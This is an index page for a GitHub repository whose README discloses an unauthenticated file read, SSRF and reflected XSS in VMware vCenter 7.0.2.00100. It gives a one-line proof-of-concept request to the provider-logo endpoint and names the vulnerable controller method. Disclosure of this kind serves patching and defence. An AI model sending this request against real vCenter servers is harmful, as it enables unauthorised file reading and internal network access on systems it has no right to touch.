Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/l0ggg/VMware_vCenter
VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS
https://github.com/l0ggg/VMware_vCenter
Last synced: 21 days ago
JSON representation
VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS
- Host: GitHub
- URL: https://github.com/l0ggg/VMware_vCenter
- Owner: l0ggg
- Created: 2021-12-01T05:13:12.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-12-01T08:02:39.000Z (about 3 years ago)
- Last Synced: 2024-02-11T21:18:14.056Z (10 months ago)
- Homepage:
- Size: 347 KB
- Stars: 219
- Watchers: 6
- Forks: 32
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - l0ggg/VMware_vCenter - VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS (Others)
README
# VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability
## POC
https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}File read:
![](./file_read.PNG)
SSRF + XSS:
![](./xss.PNG)
## vulnerable code:
/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jarcom.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()
![](./code.PNG)
Tested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id